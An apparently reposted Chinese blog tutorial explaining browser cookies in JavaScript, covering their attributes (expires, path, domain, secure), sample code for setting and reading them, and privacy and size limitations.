    if(cval!=null) document.cookie= name + "="+cval+";expires="+exp.toGMTString();
}

SetCookie ("xiaoqi", "3")
alert(getCookie('xiaoqi'));
</script>

[JS]Cookie精通之路

<!—Cookies，有些人喜欢它们，有些人憎恨它们。但是，很少有人真正知道如何使用它们。现在你可以成为少数人中的成员－可以自傲的Cookie 大师。-->

如果你象作者一样记性不好，那么你可能根本记不住人们的名字。我遇到人时，多半只是点点头，问句“吃了嘛！”，而且期望问候到此为止。如果还需要表示些什么，那么我就得求助于一些狡猾的技巧，好让我能想对方是谁。比如胡扯起一些和对方有关的人，不管他们之间关系多远，只要能避免不记得对方名字的尴尬就好： “你隔壁邻居的侄子的可爱小狗迈菲斯特怎么样？”通过这个方法，我希望能让对方感到，我确实很重视他（她），甚至还记得这些琐事，虽然实际上连名字都忘记了。但是，不是我不重视，而是我的记忆力实在是糟糕，而且要记住的名字又实在太多。如果我能给每个人设置cookies，那么我就不会再犯这种记忆力问题了。

在这篇文章里，我们要学习：

1. 什么是 Cookies?
2. Cookie 的构成
3. 操纵 Cookies
4. Cookie 怪兽

什么是Cookies?

你会问，什么是cookies呢? cookie 是浏览器保存在用户计算机上的少量数据。它与特定的WEB页或WEB站点关联起来，自动地在WEB浏览器和WEB服务器之间传递。

比如，如果你运行的是Windows操作系统，使用Internet Explorer上网，那么你会发现在你的“Windows”目录下面有一个子目录，叫做“Temporary Internet Files”。如果你有空看看这个目录，就会发现里面有一些文件，文件名称看起来就象电子邮件地址。比如在我机器上的这个目录里，就有 “jim@support.microsoft.com”这样的文件。这是一个cookie 文件，这个文件从哪来呢？猜一猜，它来自微软的支持站点。顺便说一句，这不是我的电子邮件地址，特此澄清。

对于管理细小的、不重要的、不想保存在中央数据库里的细节信息，Cookies 是个很不错的方案。（这不是说大家的名字不重要。）比如，目前网站上不断增长的自定义服务，可以为每个用户定制他们要看的内容。如果你设计的就是这样一个站点，那么你怎么来管理这样的信息：一个用户喜欢绿色的菜单条，而另一个喜欢红色的。确实是个累人的问题。不过，这样的信息，可以很安全地记录到 cookie，并保存在用户的计算机上，而你自己的数据库空间可以留给更长久更有意义的数据。

FYI: Cookies 对于安全用途，通常很有用。我不想在此就这一问题过于深入，只是提供一个示例，可以看到如何使用在一段时间之后过期的cookies来保证站点安全：

1. 使用用户名和口令，通过 SSL 登录。
2. 在服务器的数据库里检查用户名和口令。如果登录成功，建立一个当前时间标签的消息摘要 (比如 MD5) ，并把它保存在cookie和服务器数据库里。把用户的登录时间保存在服务器数据库里面的用户记录里。
3. 在进行每个安全事务时（用户处于登录状态的任何事务），把cookie的消息摘要和保存在服务器数据库里的摘要进行比较，如果比较失败，就把用户引导到登录界面。
4. 如果第3步检查通过，那么检查当前时间和登录时间之音经过的时间是否超过允许的时间长度。如果用户已经超时，那么就把用户引到登录界面。
5. 如果第3步和第4步都通过了，那么把登录时间重新设置成当前时间，允许事务发生。那些需要你登录的安全站点，可能多数使用的都是和这里介绍的类似的方法。
Cookie的构成

Cookies最初设计时，是为了CGI编程。但是，我们也可以使用Javascript脚本来操纵cookies。在本文里，我们将演示如何使用 Javascript脚本来操纵cookies。(如果有需求，我可能会在以后的文章里介绍如何使用Perl进行cookie管理。但是如果实在等不得，那么我现在就教你一手：仔细看看CGI.pm。在这个CGI包里有一个cookie()函数，可以用它建立cookie。但是，还是让我们先来介绍 cookies的本质。

在Javascript脚本里，一个cookie 实际就是一个字符串属性。当你读取cookie的值时，就得到一个字符串，里面当前WEB页使用的所有cookies的名称和值。每个cookie除了 name名称和value值这两个属性以外，还有四个属性。这些属性是： expires过期时间、 path路径、 domain域、以及 secure安全。

Expires – 过期时间。指定cookie的生命期。具体是值是过期日期。如果想让cookie的存在期限超过当前浏览器会话时间，就必须使用这个属性。当过了到期日期时，浏览器就可以删除cookie文件，没有任何影响。

Path – 路径。指定与cookie关联的WEB页。值可以是一个目录，或者是一个路径。如果http://www.zdnet.com/devhead /index.html 建立了一个cookie，那么在http://www.zdnet.com/devhead/目录里的所有页面，以及该目录下面任何子目录里的页面都可以访问这个cookie。这就是说，在http://www.zdnet.com/devhead/stories/articles 里的任何页面都可以访问http://www.zdnet.com/devhead/index.html建立的cookie。但是，如果http: //www.zdnet.com/zdnn/ 需要访问http://www.zdnet.com/devhead/index.html设置的cookes，该怎么办？这时，我们要把cookies 的path属性设置成“/”。在指定路径的时候，凡是来自同一服务器，URL里有相同路径的所有WEB页面都可以共享cookies。现在看另一个例子：如果想让 http://www.zdnet.com/devhead/filters/ 和http://www.zdnet.com/devhead/stories/共享cookies，就要把path设成“/devhead”。

Domain – 域。指定关联的WEB服务器或域。值是域名，比如zdnet.com。这是对path路径属性的一个延伸。如果我们想让 catalog.mycompany.com 能够访问shoppingcart.mycompany.com设置的cookies，该怎么办? 我们可以把domain属性设置成“mycompany.com”，并把path属性设置成“/”。FYI：不能把cookies域属性设置成与设置它的服务器的所在域不同的值。

Secure – 安全。指定cookie的值通过网络如何在用户和WEB服务器之间传递。这个属性的值或者是“secure”，或者为空。缺省情况下，该属性为空，也就是使用不安全的HTTP连接传递数据。如果一个 cookie 标记为secure，那么，它与WEB服务器之间就通过HTTPS或者其它安全协议传递数据。不过，设置了secure属性不代表其他人不能看到你机器本地保存的cookie。换句话说，把cookie设置为secure，只保证cookie与WEB服务器之间的数据传输过程加密，而保存在本地的 cookie文件并不加密。如果想让本地cookie也加密，得自己加密数据。




操纵Cookies

请记住，cookie就是文档的一个字符串属性。要保存cookie，只要建立一个字符串，格式是name=<value>（名称＝值），然后把文档的 document.cookie 设置成与它相等即可。比如，假设想保存表单接收到的用户名，那么代码看起来就象这样：

document.cookie = "username" + escape(form.username.value);

在这里，使用 escape() 函数非常重要，因为cookie值里可能包含分号、逗号或者空格。这就是说，在读取cookie值时，必须使用对应的unescape()函数给值解码。

我们当然还得介绍cookie的四个属性。这些属性用下面的格式加到字符串值后面：

name=<value>[; expires=<date>][; domain=<domain>][; path=<path>][; secure]

名称=<值>[; expires=<日期>][; domain=<域>][; path=<路径>][; 安全]

<value>, <date>, <domain> 和 <path> 应当用对应的值替换。<date> 应当使用GMT格式，可以使用Javascript脚本语言的日期类Date的.toGMTString() 方法得到这一GMT格式的日期值。方括号代表这项是可选的。比如在 [; secure]两边的方括号代表要想把cookie设置成安全的，就需要把"; secure" 加到cookie字符串值的后面。如果"; secure" 没有加到cookie字符串后面，那么这个cookie就是不安全的。不要把尖括号<> 和方括号[] 加到cookie里（除非它们是某些值的内容）。设置属性时，不限属性，可以用任何顺序设置。

下面是一个例子，在这个例子里，cookie "username" 被设置成在15分钟之后过期，可以被服务器上的所有目录访问，可以被"mydomain.com"域里的所有服务器访问，安全状态为安全。

// Date() 的构造器设置以毫秒为单位
// .getTime() 方法返回时间，单位为毫秒
// 所以要设置15分钟到期，要用60000毫秒乘15分钟
var expiration = new Date((new Date()).getTime() + 15 * 60000);
document.cookie = "username=" + escape(form.username.value)+ "; expires ="
+ expiration.toGMTString() + "; path=" + "/" + "; _
domain=" + "mydomain.com" + "; secure";

读取cookies值有点象个小把戏，因为你一次就得到了属于当前文档的所有cookies。

// 下面这个语句读取了属于当前文档的所有cookies
var allcookies = document.cookie;

现在，我们得解析allcookies变量里的不同cookies，找到感兴趣的指定cookie。这个工作很简单，因为我们可以利用Javascript语言提供的扩展字符串支持。

如果我们对前面分配的cookie "username" 感兴趣，可以用下面的脚本来读取它的值。

// 我们定义一个函数，用来读取特定的cookie值。
function getCookie(cookie_name)
｛
var allcookies = document.cookie;
var cookie_pos = allcookies.indexOf(cookie_name);

// 如果找到了索引，就代表cookie存在，
// 反之，就说明不存在。
if (cookie_pos != -1)
｛
// 把cookie_pos放在值的开始，只要给值加1即可。
cookie_pos += cookie_name.length + 1;
var cookie_end = allcookies.indexOf(";", cookie_pos);

if (cookie_end == -1)
｛
cookie_end = allcookies.length;
｝

var value = unescape(allcookies.substring(cookie_pos, cookie_end));
｝

return value;
｝

// 调用函数
var cookie_val = getCookie("username");

上面例程里的 cookie_val 变量可以用来生成动态内容，或者发送给服务器端CGI脚本进行处理。现在你知道了使用Javascript脚本操纵cookies的基本方法。但是，如果你跟我一样，那么我们要做的第一件事，就是建立一些接口函数，把cookies处理上的麻烦隐藏起来。不过，在你开始编程之前，稍候片刻。这些工作，早就有人替你做好了。你要做的，只是到哪去找这些接口函数而已。

比如，在David Flangan的Javascript: The Definitive Guide 3rd Ed.这本书里，可以找到很好的cookie应用类。你也可以在Oreilly的WEB站点上找到这本书里的例子。本文最后的链接列表里，有一些访问这些 cookie示例的直接链接。



Cookies 怪兽

因为某些原因Cookies 的名声很不好。许多人利用cookies做一些卑鄙的事情，比如流量分析、点击跟踪。Cookies 也不是非常安全，特别是没有secure属性的cookies。不过，即使你用了安全的cookies，如果你和别人共用计算机，比如在网吧，那么别人就可以窥探计算机硬盘上未加密保存的cookie文件，也就有可能窃取你的敏感信息。所以，如果你是一个WEB开发人员，那么你要认真考虑这些问题。不要滥用cookies。不要把用户可能认为是敏感的数据保存在cookies里。如果把用户的社会保险号、信用卡号等保存在cookie里，等于把这些敏感信息放在窗户纸下，无异于把用户投到极大危险之中。一个好的原则是，如果你不想陌生人了解你的这些信息，那就不要把它们保存在cookies里。

另外，cookies还有一些实际的限制。Cookies保留在计算机上，不跟着用户走。如果用户想换计算机，那么新计算机无法得到原来的cookie。甚至用户在同一台计算机上使用不同浏览器，也得不到原来的cookie：Netscape 不能读取Internet Explorer 的cookies。

还有，用户也不愿意接受cookies。所以不要以为所有的浏览器都能接受你发出的cookies。如果浏览器不接受cookies，你要保证自己的WEB站点不致因此而崩溃或中断。

另外WEB 浏览器能保留的cookies不一定能超过300个。也没有标准规定浏览器什么时候、怎么样作废cookies。所以达到限制时，浏览器能够有效地随机删除cookies。浏览器保留的来自一个WEB服务器上的cookies，不超过20个，每个cookie的数据（包括名称和值），不超过4K字节。(不过，本文里的cookie尺寸没问题，它只占了12 K字节，保存在3个3 cookies里。)

简而言之，注意保持cookie简单。不要依赖cookies的存在，不要在每个cookie里保存太多信息。不要保存太多的cookes。但是，抛除这些限制，在技巧高超的WEB管理员手里，cookie的概念是一个有用的工具。

外部链接
每个 Javascript 程序员都应当有一份Javascript： David Flanagan 的The Definitive Guide。 这本书里找到cookie 类例程可以帮助你把不止一个变量编码到单一的cookie，克服掉“每个WEB服务器20 个cookies的限制”。请点击这个链接下载该例程，ftp://ftp.oreilly.com/pub/examples/nutshell /javascript/。

Copyright © 2008

继续阅读《JavaScript使用cookie,参数设置,说明;读取,写入,删除函数》的全文内容...

分类: (S:)传统学习Javascript | Tags: cookiem  读取  写入  删除  JavaScript  学习Javascript   | 添加评论(0)

相关文章:

关于flash封装JS代码的一些TIPS  (2009-9-23 12:18:47)

JavaScript 函数的声明与运用  (2009-6-28 16:20:51)

JavaScript 循环的辅助  (2009-6-27 15:4:17)

JavaScript 三大循环  (2009-6-25 19:28:16)

JavaScript SWitch条件(case)  (2009-6-24 0:34:58)